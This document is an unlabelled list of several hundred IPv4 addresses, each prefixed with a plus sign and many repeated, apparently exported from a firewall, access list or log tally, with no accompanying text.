+190.128.222.6 +160.16.227.205 +59.90.84.144 +177.124.216.234 +34.229.51.19 +58.69.113.192 +124.107.91.77 +18.188.137.51 +160.16.238.226 +84.33.91.125 +145.239.73.226 +59.90.85.3 +117.194.129.100 +54.94.236.53 +177.1.128.112 +194.176.109.144 +117.212.183.249 +138.36.98.36 +194.176.109.138 +138.36.98.46 +201.41.123.103 +117.215.178.76 +176.42.232.204 +117.247.23.96 +117.215.178.68 +59.92.84.162 +190.99.107.130 +115.87.176.105 +34.226.254.135 +102.177.192.187 +179.228.246.216 +201.217.152.59 +63.32.208.205 +117.193.213.141 +171.103.161.118 +3.19.190.82 +117.217.214.226 +66.182.149.20 +117.216.137.162 +199.127.122.132 +72.2.130.227 +31.216.41.125 +69.28.33.100 +69.28.33.101 +117.201.27.18 +179.191.67.70 +193.95.251.28 +66.187.114.203 +177.32.196.155 +216.144.96.3 +117.217.209.44 +153.126.161.84 +181.81.140.125 +103.80.63.66 +200.165.167.51 +200.58.154.180 +117.212.191.197 +212.170.18.70 +193.226.144.163 +183.88.214.182 +198.41.36.23 +180.232.98.92 +212.37.83.134 +177.206.131.171 +203.210.244.175 +88.247.217.140 +59.92.107.8 +193.226.144.186 +66.94.100.159 +189.90.58.211 +51.68.105.123 +193.226.144.170 +193.226.144.184 +52.37.143.154 +94.140.123.36 +117.221.69.96 +3.141.112.243 +193.226.144.181 +176.58.117.41 +171.22.25.127 +193.226.144.173 +120.72.110.135 +168.138.141.119 +94.140.123.67 +50.30.96.133 +177.137.237.170 +194.59.153.48 +190.64.208.178 +117.206.129.135 +186.103.231.59 +186.158.183.232 +189.154.132.255 +52.74.70.160 +199.127.122.137 +190.210.225.128 +200.124.219.91 +117.217.209.161 +200.239.64.23 +88.26.235.89 +2.89.107.204 +193.226.144.178 +117.247.182.39 +201.48.62.12 +193.226.144.180 +207.35.252.2 +193.226.144.162 +193.226.144.187 +23.106.36.5 +14.139.176.59 +170.78.75.184 +193.226.144.171 +102.177.192.195 +52.74.130.229 +190.210.182.96 +195.23.97.244 +54.245.77.247 +61.2.46.168 +109.169.22.50 +46.19.204.254 +183.88.214.182 +59.96.231.138 +186.19.100.175 +177.133.8.95 +200.125.28.162 +117.202.141.102 +59.93.162.61 +59.92.91.112 +117.194.131.39 +34.66.20.253 +189.63.215.178 +177.8.166.65 +200.156.151.145 +109.70.138.201 +67.211.121.139 +87.138.233.138 +160.16.208.171 +201.40.29.55 +59.92.189.19 +178.170.224.84 +83.167.54.20 +193.226.144.164 +193.226.144.185 +138.204.202.72 +37.48.106.138 +194.176.109.188 +194.176.109.152 +31.216.41.108 +194.176.109.163 +178.170.224.85 +187.183.209.219 +87.246.164.138 +59.88.179.72 +138.36.97.182 +201.90.148.163 +186.50.63.250 +154.205.21.8 +64.139.127.66 +51.15.157.7 +61.2.37.224 +113.161.116.43 +189.121.190.157 +202.241.170.160 +37.48.106.141 +37.48.106.140 +52.20.43.3 +189.34.149.1 +199.127.122.136 +197.204.54.254 +153.127.39.89 +117.221.10.125 +80.157.73.218 +13.233.0.86 +117.217.208.26 +3.13.177.5 +54.169.12.211 +189.90.58.212 +196.34.30.187 +52.221.4.88 +93.57.25.85 +186.225.110.218 +83.118.16.227 +190.144.244.58 +199.243.245.178 +81.180.221.36 +117.252.85.142 +58.64.3.90 +117.212.179.37 +200.40.210.226 +162.252.237.52 +177.220.252.123 +200.199.79.104 +62.102.254.173 +189.90.58.214 +82.223.49.248 +212.156.98.90 +212.43.97.3 +117.241.216.29 +179.27.200.239 +5.252.230.181 +176.88.214.247 +189.89.178.102 +45.236.240.90 +200.155.164.22 +200.2.49.101 +117.201.8.157 +186.23.252.41 +94.140.123.144 +59.93.68.37 +139.162.240.21 +18.219.176.20 +201.6.109.104 +210.116.109.171 +71.19.200.227 +60.51.208.104 +45.236.240.90 +167.56.98.9 +8.8.249.162 +187.72.249.106 +194.176.109.184 +59.96.230.69 +189.231.144.66 +194.176.109.170 +43.242.101.3 +193.226.144.182 +143.117.14.141 +117.216.44.173 +117.194.140.107 +117.200.157.14 +134.209.122.59 +137.119.32.34 +62.94.56.23 +45.236.240.90 +194.182.159.155 +189.5.134.54 +177.37.164.34 +117.200.184.212 +113.161.8.98 +43.242.101.14 +187.120.1.126 +59.92.106.166 +38.92.61.90 +139.162.250.21 +117.217.210.223 +59.96.57.68 +117.202.136.244 +54.185.239.213 +59.92.181.56 +69.80.192.82 +117.221.243.84 +117.194.130.239 +117.241.217.143 +183.88.214.182 +138.36.98.37 +117.217.212.109 +31.14.19.15 +216.144.96.2 +61.2.217.100 +188.34.192.169 +117.212.190.206 +159.148.46.154 +77.93.27.90 +117.215.127.54 +187.11.236.13 +54.209.82.14 +40.76.61.36 +178.170.224.82 +200.40.212.150 +59.92.107.71 +52.72.203.226 +193.226.90.202 +45.33.125.157 +193.226.144.191 +170.80.70.18 +35.153.73.30 +13.228.229.170 +133.242.5.234 +178.254.101.169 +83.56.10.19 +117.201.24.169 +23.106.62.22 +193.226.144.167 +193.226.144.169 +170.80.70.19 +177.74.79.175 +170.80.70.21 +187.5.170.210 +31.216.41.7 +81.192.9.198 +208.103.14.36 +193.226.144.168 +201.16.162.129 +52.25.227.217 +117.197.194.168 +80.211.15.150 +181.13.229.114 +14.192.159.214 +66.182.149.34 +31.216.41.12 +187.38.46.235 +193.226.144.189 +59.88.187.24 +172.105.210.109 +193.226.144.188 +3.132.101.29 +193.226.144.174 +82.142.100.18 +103.153.140.221 +31.216.41.57 +103.233.180.15 +82.76.174.107 +186.223.231.210 +52.67.203.7 +117.241.218.189 +181.111.221.242 +117.193.201.162 +122.176.102.239 +68.67.124.5 +199.127.122.133 +201.33.199.184 +152.67.164.176 +59.92.92.39 +212.156.94.134 +201.217.141.26 +90.63.200.192 +80.211.91.74 +194.176.109.190 +59.90.97.192 +186.212.127.168 +185.3.93.83 +181.24.151.51 +120.28.151.87 +59.98.58.155 +59.92.107.98 +195.76.31.132 +191.240.255.55 +181.120.191.186 +195.13.199.212 +190.64.142.116 +138.36.97.178 +130.237.161.143 +91.223.250.77 +194.176.109.135 +59.98.59.71 +189.112.108.201 +117.194.138.6 +191.178.148.226 +54.234.254.181 +138.122.165.122 +92.243.6.55 +193.226.144.179 +81.215.63.123 +178.170.224.83 +177.89.245.201 +117.217.212.86 +177.75.64.28 +194.176.109.136 +153.126.158.201 +194.176.109.185 +160.16.116.168 +117.216.45.212 +117.200.178.206 +210.116.109.170 +194.176.109.156 +152.250.243.216 +190.64.94.141 +152.14.92.184 +117.221.0.180 +193.111.245.198 +136.158.252.155 +31.216.41.61 +117.221.245.84 +45.45.36.222 +186.158.183.234 +83.103.186.144 +46.243.119.28 +177.159.123.241 +23.106.62.80 +67.109.224.163 +31.216.41.62 +129.151.32.149 +31.216.41.16 +201.217.140.202 +34.224.135.6 +3.221.112.171 +59.99.228.29 +61.2.32.216 +84.237.195.20 +194.176.109.141 +117.221.244.190 +112.199.118.125 +94.140.123.253 +108.174.123.178 +23.106.61.72 +72.2.130.226 +91.216.103.42 +131.196.131.31 +117.193.201.86 +94.142.237.181 +59.99.228.20 +81.149.136.225 +59.91.156.248 +194.79.87.121 +117.221.237.106 +117.241.70.128 +59.95.162.110 +61.19.29.248 +34.238.69.170 +94.43.99.58 +122.155.136.218 +129.159.59.191 +95.19.179.91 +201.91.150.154 +201.217.145.163 +69.28.33.118 +152.244.244.13 +190.64.65.164 +119.92.150.131 +219.92.12.253 +194.176.109.177 +54.233.154.55 +61.2.35.208 +117.200.177.93 +175.141.145.175 +193.226.144.166 +61.3.201.67 +160.16.209.129 +94.140.123.231 +89.44.226.73 +189.11.235.211 +34.224.113.3 +74.203.152.115 +203.115.196.131 +59.88.183.238 +102.177.192.204 +162.254.130.19 +113.161.116.41 +117.200.179.9 +130.237.161.78 +69.28.33.100 +45.236.240.90 +190.2.12.155 +206.82.209.252 +91.218.224.17 +177.66.12.138 +23.106.62.26 +185.29.79.192 +45.236.240.90 +54.207.39.248 +183.88.214.182 +18.214.57.164 +18.230.102.221 +113.161.116.43 +45.236.240.90 +109.224.64.6 +216.218.206.2 +54.89.105.107 +45.175.144.245 +191.7.191.18 +189.7.74.229 +52.71.186.41 +200.201.177.194 +34.132.66.81 +45.236.240.90 +50.227.50.106 +45.236.240.90 +177.69.83.139 +103.87.196.127 +190.12.100.104 +138.94.11.227 +54.88.93.179 +34.196.7.189 +183.88.214.182 +52.205.54.0 +64.15.174.139 +200.98.163.159 +52.33.246.240 +187.86.212.130 +52.238.106.150 +54.204.174.139 +200.143.34.228 +78.83.12.242 +43.224.139.168 +68.67.124.4 +197.159.66.179 +40.68.174.31 +35.239.220.54 +89.36.143.5 +52.138.140.75 +43.224.139.169 +187.44.83.106 +64.7.163.2 +193.231.147.41 +50.30.96.150 +45.236.240.90 +44.239.155.240 +78.136.12.187 +185.29.79.194 +203.77.246.122 +52.20.171.2 +87.246.164.138 +81.169.131.165 +74.208.162.190 +93.240.205.213 +45.40.160.52 +183.88.214.182 +54.253.148.86 +35.182.117.5 +80.82.213.104 +196.203.216.110 +162.223.141.213 +130.237.161.78 +213.210.228.52 +52.31.71.48 +23.97.195.14 +91.218.224.168 +44.193.114.227 +54.196.11.6 +109.74.6.32 +213.187.74.98 +23.23.174.119 +66.175.147.174 +69.28.33.118 +76.223.35.123 +72.2.130.227 +64.15.174.136 +50.30.96.133 +207.104.75.231 +54.186.83.135 +167.216.134.139 +201.157.59.231 +43.224.139.166 +104.40.204.137 +69.28.33.101 +124.158.162.10 +49.206.240.154 +194.48.34.18 +158.122.132.21 +54.245.33.26 +195.175.60.182 +213.187.74.100 +82.113.183.14 +85.90.3.49 +34.198.123.214 +44.196.12.115 +104.243.1.4 +3.218.171.191 +217.128.9.246 +83.219.0.214 +18.116.56.125 +3.22.141.66 +3.224.32.3 +34.225.78.164 +43.224.139.165 +189.41.20.237 +185.29.79.195 +34.194.36.151 +66.182.149.20 +176.42.232.204 +91.216.103.41 +52.166.8.155 +62.196.61.35 +207.144.250.6 +67.211.121.140 +185.29.79.219 +199.127.122.136 +54.94.182.162 +91.121.46.207 +72.2.130.226 +176.124.251.97 +194.48.34.13 +107.20.214.199 +54.233.145.176 +67.211.121.139 +204.28.1.79 +67.130.117.149 +52.7.82.166 +46.39.254.131 +41.77.66.16 +212.43.97.3 +66.97.33.171 +199.38.185.3 +91.92.214.9 +216.7.125.41 +85.90.3.46 +207.144.250.4 +148.243.155.37 +211.27.255.36 +134.48.24.210 +213.60.205.37 +64.15.174.133 +192.101.9.131 +3.98.71.205 +193.174.232.54 +40.74.62.232 +54.157.70.144 +76.223.23.86 +72.24.104.202 +176.221.91.99 +93.51.173.137 +184.73.59.160 +3.13.190.230 +3.97.2.55 +184.159.69.133 +193.111.10.132 +183.88.214.182 +54.209.82.14 +34.72.13.8 +43.224.139.167 +201.17.247.72 +52.204.113.91 +130.237.161.143 +40.70.79.242 +43.224.139.173 +72.167.109.181 +213.60.205.38 +54.67.117.10 +101.110.49.5 +103.228.19.204 +54.186.143.230 +187.86.212.135 +82.213.48.146 +194.29.168.11 +3.22.230.193 +167.114.142.181 +52.72.111.199 +54.36.183.236 +85.90.3.45 +211.27.255.37 +194.48.34.12 +104.45.8.112 +54.71.240.16 +54.172.53.200 +200.239.64.200 +158.224.83.75 +189.112.78.8 +167.216.134.140 +184.159.69.132 +93.240.189.202 +167.216.134.136 +54.236.232.44 +193.164.142.143 +203.77.233.164 +34.201.3.45 +63.228.189.196 +44.236.13.41 +170.145.102.12 +64.7.163.3 +70.63.186.98 +45.236.240.90 +103.136.114.141 +13.93.121.174 +34.202.124.43 +109.74.2.5 +104.192.6.173 +201.156.82.198 +152.228.220.233 +195.55.52.189 +203.125.67.216 +85.194.241.237 +52.203.141.218 +3.209.229.241 +179.27.126.19 +69.46.7.35 +132.148.11.181 +190.196.18.107 +54.85.8.170 +91.93.68.38 +184.72.139.164 +103.41.32.203 +88.255.146.140 +104.40.180.96 +82.77.1.254 +146.88.64.83 +182.70.124.81 +167.216.134.135 +167.216.134.133 +34.230.69.242 +201.156.82.197 +80.153.112.10 +110.170.243.104 +34.224.143.74 +190.58.139.152 +40.68.173.22 +212.60.80.22 +194.48.34.16 +52.67.59.229 +216.23.211.218 +198.136.36.236 +107.0.141.231 +54.159.255.239 +3.13.160.131 +206.161.23.163 +210.245.99.234 +115.131.131.199 +20.50.172.68 +207.144.250.5 +209.143.234.146 +209.143.234.143 +132.148.10.97 +185.160.48.227 +3.223.141.249 +209.143.234.97 +195.201.29.182 +204.16.106.104 +35.169.161.98 +54.233.96.240 +120.50.44.233 +182.74.105.110 +50.194.137.69 +180.183.124.36 +112.109.91.210 +139.138.128.153 +139.138.128.149 +202.137.22.21 +52.233.198.81 +103.136.114.140 +3.233.194.126 +177.71.153.246 +54.207.57.68 +209.143.234.147 +75.101.247.177 +18.230.63.175 +209.143.234.142 +34.206.219.43 +148.240.194.69 +138.201.156.202 +67.109.224.163 +54.146.135.10 +101.53.141.68 +80.146.197.153 +35.167.127.59 +104.40.153.112 +35.182.13.128 +186.202.182.191 +112.109.91.213 +187.49.223.111 +62.183.181.115 +80.27.123.40 +35.182.190.115 +193.30.141.211 +128.136.227.205 +37.252.123.143 +147.50.132.81 +199.127.122.154 +187.94.98.229 +170.210.203.68 +147.174.1.125 +94.176.180.23 +154.58.18.12 +178.170.224.85 +178.170.224.82 +178.170.224.84 +178.170.224.83 +209.143.234.139 +209.143.234.97 +209.143.234.195 +64.56.216.2 +64.18.242.2 +120.72.110.133 +103.210.73.249 +52.174.106.118 +61.110.100.76 +120.72.110.135 +85.90.3.45 +54.169.12.211 +13.230.129.178 +192.101.9.130 +200.71.162.41 +207.144.250.5 +70.182.222.252 +207.144.250.6 +211.29.152.118 +31.216.41.61 +213.60.205.36 +213.60.205.38 +195.246.49.13 +160.16.238.226 +50.194.137.69 +54.204.174.139 +52.54.204.0 +167.216.134.139 +85.90.3.49 +82.113.183.14 +209.143.234.109 +193.49.18.239 +199.192.202.50 +60.54.35.157 +177.153.8.152 +194.48.244.98 +45.33.5.58 +85.214.107.50 +3.13.177.5 +194.59.153.48 +200.137.6.98 +82.113.183.13 +66.182.149.20 +31.216.40.150 +54.227.71.247 +202.79.18.236 +47.254.234.152 +153.126.161.84 +45.33.119.181 +206.161.23.172 +172.104.194.177 +210.109.94.4 +206.161.23.164 +199.38.185.3 +210.109.94.17 +199.38.185.2 +161.82.200.227 +204.13.32.57 +190.6.72.198 +51.68.185.203 +44.196.12.115 +199.127.122.133 +199.127.122.132 +179.95.126.202 +54.184.238.146 +54.225.199.124 +93.186.183.73 +190.7.99.74 +213.214.150.220 +72.24.104.202 +64.15.174.101 +198.58.99.127 +104.237.129.108 +199.192.202.50 +186.202.182.191 +146.12.193.12 +146.12.193.23 +201.157.59.232 +54.169.146.246 +68.67.124.4 +212.112.107.252 +34.206.129.3 +52.20.43.3 +52.72.4.61 +200.143.14.23 +171.22.25.127 +200.69.103.23 +34.72.13.8 +52.74.130.229 +209.143.234.13 +202.131.110.74 +199.48.170.11 +63.251.188.85 +96.126.120.79 +139.162.250.21 +195.182.206.246 +45.234.254.184 +81.1.221.138 +81.45.140.46 +161.0.124.50 +78.136.8.145 +188.165.33.37 +115.133.208.41 +177.125.178.14 +202.152.23.70 +104.243.1.4 +3.132.101.29 +172.105.47.106 +91.121.217.75 +43.243.126.39 +185.160.48.228 +52.9.62.49 +187.75.165.123 +213.238.178.167 +80.27.123.40 +75.101.247.177 +68.67.124.5 +197.253.13.203 +52.1.162.246 +78.136.12.187 +121.122.124.78 +71.19.200.226 +23.135.64.23 +177.135.248.94 +207.144.250.4 +50.16.141.218 +179.152.32.64 +162.247.215.74 +3.0.25.5 +129.232.155.186 +190.226.21.104 +216.144.96.3 +94.45.131.130 +54.246.139.15 +66.228.49.194 +36.81.156.161 +54.172.53.200 +146.12.193.210 +67.211.121.139 +146.12.193.69 +185.173.27.34 +82.213.48.146 +146.12.193.79 +146.12.193.81 +43.243.127.92 +13.81.52.2 +52.76.22.45 +146.12.193.127 +146.12.193.116 +66.182.149.34 +146.12.194.42 +213.145.151.186 +72.2.130.227 +63.249.54.18 +37.159.131.134 +200.14.200.13 +146.12.193.80 +202.160.125.7 +212.112.107.252 +34.224.143.74 +213.238.178.228 +112.109.91.213 +112.109.91.210 +162.254.130.19 +45.162.68.31 +103.136.114.140 +41.219.127.127 +146.12.194.47 +52.232.36.43 +162.252.237.52 +103.136.114.132 +173.255.201.243 +35.182.117.5 +153.126.158.201 +91.121.51.157 +67.229.79.179 +162.222.31.214 +38.92.61.90 +201.48.128.161 +199.71.210.180 +139.138.128.153 +104.154.202.115 +213.187.74.97 +34.66.20.253 +160.16.116.168 +52.232.35.94 +45.33.21.238 +189.112.63.177 +64.15.174.131 +160.16.208.171 +64.139.127.66 +18.204.57.121 +34.205.13.186 +89.101.192.9 +64.15.174.132 +195.112.122.7 +177.159.155.170 +69.20.105.203 +190.196.15.109 +123.30.19.19 +153.127.39.89 +64.139.127.67 +213.81.160.18 +216.241.16.28 +206.161.23.163 +103.141.208.117 +206.161.23.170 +206.161.23.171 +162.223.141.198 +185.3.93.116 +35.239.220.54 +206.161.23.162 +52.204.113.91 +209.143.234.139 +193.146.1.93 +213.187.74.103 +40.118.44.62 +89.249.20.75 +216.130.95.33 +200.45.78.170 +201.217.137.66 +52.5.183.10 +91.243.118.202 +87.110.211.126 +34.201.3.45 +54.184.238.146 +146.148.56.142 +3.233.194.126 +45.236.240.90 +45.33.112.157 +34.123.2.177 +58.27.97.49 +5.2.150.190 +81.25.210.33 +72.43.8.122 +3.141.112.243 +194.48.244.101 +168.138.239.123 +194.176.109.144 +216.7.125.42 +194.176.109.190 +194.176.109.136 +52.203.141.218 +179.27.126.13 +194.176.109.141 +199.66.220.186 +202.129.39.217 +216.144.96.2 +71.19.200.227 +80.157.73.218 +178.244.248.37 +107.161.68.107 +92.243.6.55 +66.228.49.149 +109.70.138.236 +157.164.184.234 +64.15.174.135 +160.16.227.205 +160.16.209.129 +183.81.129.68 +195.228.124.81 +3.212.216.213 +54.157.69.151 +64.15.174.195 +64.15.174.185 +103.210.73.119 +41.77.66.16 +162.254.130.18 +184.72.72.157 +209.143.234.145 +199.202.27.22 +24.41.66.177 +202.52.15.82 +85.105.247.231 +139.138.128.149 +66.97.33.171 +35.182.190.115 +120.72.110.134 +138.201.156.202 +45.33.113.128 +3.233.175.80 +213.153.177.18 +84.17.211.20 +193.230.241.4 +50.30.96.132 +64.15.174.134 +3.220.21.146 +54.208.108.96 +50.30.96.133 +74.208.154.48 +35.169.161.98 +72.14.178.9 +103.233.180.15 +69.28.33.118 +219.92.68.60 +37.187.75.112 +94.176.180.23 +77.109.151.142 +185.17.196.194 +45.236.240.90 +18.140.103.115 +187.189.37.227 +74.208.162.190 +82.114.168.10 +109.224.64.6 +165.233.109.71 +210.245.99.234 +185.17.196.194 +208.78.163.74 +66.182.128.199 +201.7.234.3 +62.242.67.180 +104.237.133.103 +149.202.95.4 +31.216.41.55 +148.243.155.37 +3.238.105.199 +194.48.34.15 +117.120.25.21 +54.200.149.188 +67.211.121.140 +52.209.207.19 +83.61.8.92 +138.94.38.29 +52.33.141.255 +34.206.219.43 +52.77.233.142 +176.221.91.99 +148.240.194.68 +200.27.105.22 +31.206.63.244 +162.223.141.198 +64.15.174.139 +170.225.128.43 +101.53.141.68 +118.101.26.128 +141.95.18.142 +52.201.50.89 +196.30.77.124 +196.30.77.122 +54.196.11.6 +45.56.73.234 +217.56.64.17 +91.121.111.175 +123.30.19.14 +45.58.5.101 +34.226.71.76 +211.29.133.135 +3.223.141.249 +217.169.111.162 +3.209.229.241 +67.130.117.149 +34.194.52.156 +51.75.28.90 +83.219.0.214 +94.180.121.164 +54.202.181.197 +91.121.219.129 +51.75.28.56 +45.33.127.249 +23.106.61.66 +199.101.246.205 +31.216.41.57 +45.79.9.146 +31.216.41.59 +31.216.41.125 +187.108.204.246 +31.216.41.108 +31.216.41.62 +31.216.41.63 +194.182.159.153 +18.214.57.164 +78.187.168.11 +131.0.246.226 +74.208.167.138 +68.67.124.5 +217.221.16.124 +100.26.196.193 +176.221.8.174 +52.20.171.2 +74.208.193.66 +63.228.189.196 +194.176.109.145 +194.176.109.170 +78.186.38.107 +194.176.109.188 +170.247.9.97 +31.216.41.12 +194.176.109.157 +179.27.154.9 +194.176.109.156 +31.216.41.7 +103.94.52.49 +200.143.34.228 +200.143.34.203 +199.101.246.173 +194.176.109.163 +194.176.109.135 +146.12.193.33 +194.176.109.152 +13.228.55.159 +167.216.134.131 +3.19.190.82 +167.216.134.132 +146.12.193.35 +64.7.163.3 +13.228.229.170 +63.251.188.86 +64.7.163.2 +177.149.159.60 +3.234.86.27 +45.79.51.152 +45.33.25.83 +185.227.111.208 +194.94.133.236 +217.169.111.43 +82.165.119.213 +211.29.132.244 +209.143.234.14 +45.33.125.87 +191.240.146.74 +34.202.124.43 +187.75.245.69 +216.81.30.52 +211.29.152.64 +67.109.224.164 +69.164.202.82 +52.233.198.81 +144.208.2.153 +95.9.237.175 +50.227.50.106 +52.8.40.167 +213.60.205.37 +103.17.238.212 +35.166.115.253 +54.67.117.10 +199.127.122.137 +108.174.123.178 +199.127.122.136 +184.72.139.164 +103.17.238.218 +45.191.204.3 +189.89.232.118 +194.176.109.177 +194.176.109.184 +200.127.232.198 +196.7.156.4 +137.119.32.34 +13.68.108.248 +146.12.193.113 +146.12.193.84 +200.146.242.97 +200.123.3.20 +69.28.33.101 +54.157.69.151 +74.219.165.131 +82.223.49.248 +54.201.143.20 +34.219.49.94 +193.111.10.132 +69.28.33.100 +43.243.127.92 +87.103.240.194 +210.116.109.170 +38.92.140.7 +46.39.254.131 +45.79.45.9 +218.248.2.228 +118.69.218.82 +54.144.135.121 +148.240.194.69 +148.240.194.68 +52.87.71.151 +54.204.243.211 +8.35.197.226 +72.28.97.37 +200.137.6.96 +212.81.199.176 +54.157.70.144 +50.116.21.135 +195.246.49.36 +110.170.243.104 +93.56.31.70 +190.143.78.137 +18.210.240.101 +72.2.130.226 +207.104.75.231 +52.74.70.160 +212.43.97.3 +54.88.93.179 +54.89.105.107 +81.18.99.12 +113.161.100.211 +54.92.217.202 +172.105.47.99 +203.246.159.173 +116.203.66.219 +52.204.129.206 +208.78.163.80 +14.63.218.222 +85.105.246.241 +23.106.61.72 +191.37.242.85 +52.3.22.234 +52.5.87.201 +179.96.231.69 +67.109.224.163 +34.132.66.81 +138.94.114.18 +201.157.59.231 +202.152.23.72 +146.12.194.69 +194.176.109.138 +146.12.194.70 +199.101.246.195 +194.48.244.99 +3.215.183.132 +88.250.224.14 +103.41.32.203 +172.105.49.175 +50.30.96.150 +34.66.20.253 +208.103.14.36 +85.25.207.215 +182.18.157.87 +153.127.12.60 +69.13.19.72 +54.185.239.213 +192.101.9.131 +3.85.234.194 +89.200.193.141 +177.19.235.223 +201.156.82.198 +201.156.82.197 +52.215.175.192 +201.6.242.142 +183.88.214.182 +160.16.111.68 +45.236.240.90 +216.207.192.128 +138.186.17.82 +31.145.74.202 +38.92.140.7 +183.88.214.182 +123.16.245.134 +45.236.240.90 +201.148.103.165 +45.236.240.90 +186.251.226.154 +52.72.4.61 +179.232.214.102 +179.255.34.235 +45.236.240.90 +112.133.230.54 +168.228.181.122 +54.201.72.174 +183.88.214.182 +177.41.215.168 +171.22.25.127 +183.88.214.182 +189.112.56.144 +45.236.240.90 +173.0.157.237 +54.89.15.225 +168.228.219.84 +35.130.132.106 +45.236.240.90 +45.236.240.90 +183.88.214.182 +179.83.221.63 +45.236.240.90 +177.191.248.35 +177.191.33.220 +187.19.205.116 +171.22.25.127 +138.94.114.18 +54.144.21.50 +167.250.241.28 +54.88.133.92 +212.56.196.42 +34.68.46.87 +45.236.240.90 +209.54.6.42 +64.129.215.73 +183.88.214.182 +54.89.15.225 +60.50.151.100 +184.72.112.158 +52.70.106.10 +177.125.214.240 +36.74.150.129 +107.21.219.220 +191.191.162.96 +69.46.7.35 +45.160.26.113 +122.11.242.11 +34.194.74.223 +117.241.219.24 +35.173.27.23 +208.78.163.80 +51.91.18.91 +45.160.27.90 +195.246.49.54 +45.160.27.93 +52.205.91.6 +183.88.214.182 +209.131.10.179 +183.88.214.182 +3.223.114.73 +206.161.23.174 +183.88.214.182 +177.207.230.0 +158.122.132.32 +189.206.13.74 +183.88.214.182 +52.26.96.44 +177.33.46.2 +191.209.50.240 +43.242.101.76 +45.236.240.90 +138.204.117.195 +183.88.214.182 +183.88.214.182 +34.132.242.43 +173.212.230.226 +45.236.240.90 +189.113.119.18 +77.74.192.99 +179.24.225.75 +183.88.214.182 +183.88.214.182 +183.88.214.182 +183.88.214.182 +187.115.25.154 +3.234.86.27 +131.108.167.26 +104.10.241.1 +168.197.114.161 +183.88.214.182 +183.88.214.182 +208.71.246.23 +183.88.214.182 +107.21.219.220 +37.159.131.134 +54.235.77.41 +194.199.8.31 +183.88.214.182 +183.88.214.182 +82.113.183.13 +77.74.192.100 +34.194.74.223 +88.250.60.53 +200.143.34.203 +113.161.100.211 +52.233.143.134 +204.28.1.106 +208.78.163.74 +209.131.10.179 +146.148.56.142 +179.27.201.140 +196.211.21.19 +183.88.214.182 +185.227.111.208 +199.127.122.137 +199.127.122.132 +45.230.226.244 +199.127.122.154 +34.123.2.177 +193.146.1.93 +146.12.193.117 +45.230.226.247 +122.11.242.11 +183.88.214.182 +183.88.214.182 +3.238.43.240 +146.12.193.107 +146.12.193.32 +213.60.205.36 +146.12.193.34 +217.56.64.17 +146.12.193.24 +146.12.193.47 +52.70.106.10 +183.88.214.182 +54.144.21.50 +146.12.194.34 +146.12.193.138 +202.137.3.250 +194.79.87.5 +146.12.193.241 +162.223.141.201 +179.95.195.6 +183.88.214.182 +183.88.214.182 +45.236.240.90 +201.55.56.73 +110.159.240.114 +146.12.193.129 +3.221.112.171 +104.41.47.46 +181.39.8.38 +40.118.41.32 +81.42.215.31 +183.88.214.182 +47.254.234.152 +187.86.212.133 +62.102.254.175 +104.46.56.205 +54.88.133.92 +123.30.19.14 +4.15.64.162 +187.86.212.155 +18.209.232.109 +13.248.152.34 +202.144.158.94 +183.88.214.182 +8.35.197.226 +183.88.214.182 +146.12.193.79 +182.74.105.107 +162.223.141.203 +146.12.193.70 +162.223.141.212 +180.183.103.19 +183.88.214.182 +3.98.147.225 +54.204.243.211 +52.174.251.243 +43.224.139.176 +183.88.214.182 +183.88.214.182 +146.12.193.48 +183.88.214.182 +177.156.81.175 +183.88.214.182 +183.88.214.182 +177.133.89.222 +187.19.153.151 +179.105.110.2 +171.22.25.127 +201.139.92.50 +183.88.214.182 +45.236.240.90 +186.247.89.217 +45.236.240.90 +191.33.194.1 +189.69.245.41 +150.107.43.131 +183.88.214.182 +178.131.78.161 +45.236.240.90 +186.113.7.219 +54.232.34.196 +179.185.87.188 +183.88.214.182 +45.236.240.90 +183.88.214.182 +183.88.214.182 +183.88.214.182 +183.88.214.182 +183.88.214.182 +183.88.214.182 +200.123.26.73 +183.88.214.182 +198.178.223.98 +183.88.214.182 +52.53.116.53 +3.221.112.171 +18.229.29.113 +183.88.214.182 +198.178.223.93 +184.72.112.158 +183.88.214.182 +69.20.105.202 +45.236.240.90 +200.123.27.76 +183.88.214.182 +40.118.45.48 +183.88.214.182 +14.207.15.154 +103.255.181.53 +177.180.0.132 +183.88.214.182 +183.88.214.182 +194.48.34.14 +183.88.214.182 +117.239.0.75 +183.88.214.182 +146.12.193.35 +183.88.214.182 +183.88.214.182 +183.88.214.182 +183.88.214.182 +146.12.193.22 +146.12.193.127 +183.88.214.182 +40.69.59.164 +190.104.80.4 +189.78.251.137 +146.12.193.33 +146.12.193.14 +179.255.34.191 +131.255.82.74 +179.184.26.142 +183.88.214.182 +45.236.240.90 +117.207.120.80 +170.79.75.24 +183.88.214.182 +183.88.214.182 +52.37.135.94 +177.190.201.42 +183.88.214.182 +45.230.226.240 +45.230.226.243 +143.0.196.130 +199.9.63.124 +45.236.240.90 +45.230.226.246 +52.37.129.219 +200.5.9.62 +179.105.237.202 +45.230.226.245 +45.236.240.90 +123.108.201.216 +64.187.126.12 +190.210.182.125 +45.236.240.90 +183.88.214.182 +183.88.214.182 +45.236.240.90 +183.88.214.182 +210.213.238.98 +209.239.2.249 +183.88.214.182 +45.236.240.90 +201.73.0.44 +183.88.214.182 +183.88.214.182 +171.22.25.127 +177.38.159.118 +45.236.240.90 +189.114.38.179 +45.236.240.90 +45.236.240.90 +185.70.135.208 +179.185.17.187 +193.226.144.177 +94.140.123.38 +100.42.70.27 +207.167.244.110 +52.36.35.163 +195.246.49.36 +100.37.240.186 +115.147.19.108 +179.185.17.186 +186.249.10.118 +201.150.45.154 +64.7.163.2 +118.69.70.215 +185.106.240.79 +105.155.1.38 +195.246.49.13 +34.123.2.177 +180.232.98.90 +193.231.34.15 +177.206.246.129 +182.74.124.186 +180.75.10.109 +155.223.64.138 +105.157.183.91 +189.154.128.184 +189.2.175.146 +217.92.76.27 +109.0.132.85 +193.226.144.161 +193.226.144.160 +193.226.144.176 +61.3.202.132 +194.176.109.186 +109.70.138.239 +179.184.11.252 +41.103.236.207 +79.188.136.130 +45.236.240.90 +201.131.6.110 +187.75.90.236 +186.235.86.94 +118.27.13.210 +131.0.200.158 +138.36.98.39 +177.96.36.195 +155.223.64.136 +193.226.144.183 +138.94.109.68 +131.72.127.245 +212.125.32.59 +201.99.104.11 +167.58.166.153 +59.96.230.143 +201.91.150.154 +187.49.72.113 +185.106.240.77 +183.88.214.182 +170.83.172.72 +85.105.91.249 +41.96.160.232 +185.106.240.78 +107.141.138.123 +175.139.226.245 +187.113.202.163 +177.133.232.66 +197.242.145.97 